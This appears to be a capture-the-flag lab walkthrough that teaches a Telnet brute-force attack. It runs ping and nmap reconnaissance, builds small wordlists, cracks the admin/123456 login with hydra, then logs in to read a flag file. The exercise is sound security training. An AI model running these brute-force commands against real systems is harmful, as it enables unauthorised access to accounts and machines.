Telnet Brute Force and Weak Credentials

Introduction

Welcome to this hands-on lab focused on password security and brute-force attacks. Many security breaches occur not because of complex software exploits, but due to simple, weak, or default credentials. A brute-force attack is an automated method of trying numerous username and password combinations until the correct one is found.

In this lab, you will simulate an attack on a system with a vulnerable Telnet service protected by a weak password. You will use standard penetration testing tools to perform reconnaissance, prepare for the attack, and execute it. You will start by verifying connectivity, scanning the target with nmap, and then using hydra, a popular password-cracking tool, to discover the login credentials. Finally, you'll use the discovered credentials to access the system and capture a flag.

Upon completion, you will understand how to:

• Verify network connectivity using ping.
• Use nmap to confirm a specific service is running.
• Create wordlists for a brute-force attack.
• Use hydra to perform a brute-force attack against a Telnet service.
• Gain access to a system using compromised credentials.

Let's get started.

Verify Connectivity to Target with Ping

In this step, you will start by confirming that your attack machine can communicate with the target system. The ping command is a basic network diagnostic tool that sends a request to a target host and listens for a reply, confirming its reachability.

Your environment includes a target system accessible with the hostname target. To ensure it's online and responsive, run the following command in your terminal. The -c 4 flag tells ping to send exactly four packets.

ping -c 4 target

You should see a response similar to the one below. This confirms that the target is online and your network connection is stable. The IP address and response times may differ slightly.

PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.064 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.063 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.064 ms

--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.063/0.069/0.086/0.010 ms

With connectivity confirmed, you are ready to proceed with scanning the target.

Scan Open Ports with Nmap

In this step, you will use nmap to scan the target for open ports and running services. This is a critical part of reconnaissance, as it helps identify potential points of entry. We suspect a Telnet service is running, which typically uses port 23.

To confirm this, run a targeted nmap scan. The -p 23 flag focuses the scan specifically on the Telnet port.

Execute the following command in your terminal:

nmap -p 23 target

The output will show the status of the specified port. You should see a result similar to this:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-19 14:10 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00040s latency).

PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

The output confirms that port 23/tcp is open and is running a telnet service. This is the service we will target in the next step.

Connect to Target via Telnet with Brute Force

In this step, you will perform a brute-force attack against the Telnet service using hydra. Since we don't know the password, we will provide hydra with lists of potential usernames and passwords to try automatically.

First, create two simple wordlists. One for usernames (users.txt) and one for passwords (pass.txt). We will include common and likely candidates.

Create the username list:

echo -e "admin\nuser\nroot" > users.txt

Create the password list:

echo -e "password\nadmin\n123456" > pass.txt

Now, use hydra to launch the attack. The -L flag specifies the user list, -P specifies the password list, and telnet://target defines the protocol and host to attack.

hydra -L users.txt -P pass.txt telnet://target

hydra will now attempt to log in with every combination of username and password from your lists. After a few moments, it will find the correct credentials and display them.

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-19 14:11:54
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking telnet://target:23/
[23][telnet] host: target   login: admin   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-19 14:11:57

The output clearly shows that a valid login was found: username admin with password 123456.

Explore Target System and Locate Flag

In this step, you will use the credentials discovered by hydra to log into the target system and find the flag. This is the final phase of the attack, where you achieve your objective.

Connect to the target using the telnet client:

telnet target

The system will prompt you for a login. Enter the username admin and press Enter. Then, when prompted for the password, enter 123456 and press Enter.

Trying 172.17.0.2...
Connected to target.
Escape character is '^]'.

Linux 5.15.0-56-generic (target) (pts/0)

target login: admin
Password:

Upon successful login, you will be presented with a shell prompt. You are now inside the target system.

Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Fri Sep 19 06:11:55 UTC 2025 from 172.17.0.1 on pts/0
admin@target:~$

Now, list the contents of the current directory (/home/admin) to find the flag.

ls -la

You will see the flag.txt file in the listing.

admin@target:~$ ls -la
total 28
drwxr-xr-x 3 admin admin 4096 Sep 19 06:11 .
drwxr-xr-x 1 root  root  4096 Sep 19 06:08 ..
-rw-r--r-- 1 admin admin  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 admin admin 3771 Feb 25  2020 .bashrc
drwx------ 2 admin admin 4096 Sep 19 06:11 .cache
-rw-r--r-- 1 admin admin  807 Feb 25  2020 .profile
-rw-r--r-- 1 admin admin   33 Sep 19 06:08 flag.txt

Finally, use the cat command to read the contents of flag.txt.

cat flag.txt

The terminal will display the flag.

admin@target:~$ cat flag.txt
labex{w34k_p4ssw0rd_brut3f0rc3d}

Congratulations! You have successfully brute-forced the Telnet service and captured the flag. Copy the flag value to complete the lab. To exit the session, type logout and press Enter.

Summary

In this lab, you successfully executed a brute-force attack against a Telnet service. You learned a systematic approach to compromising a system with weak credentials.

You practiced how to:

• Confirm network reachability with ping.
• Use nmap to verify that a specific service is active on a target port.
• Create simple but effective username and password wordlists.
• Employ hydra to automate the process of trying login combinations and identify valid credentials.
• Use the compromised credentials to log in, explore the target system, and retrieve a flag.

This exercise demonstrates a fundamental security risk: the use of weak, guessable passwords. It also highlights the danger of using unencrypted protocols like Telnet, which expose credentials to network sniffing. The skills you've learned are essential for both ethical hackers who test system defenses and for system administrators who must secure them.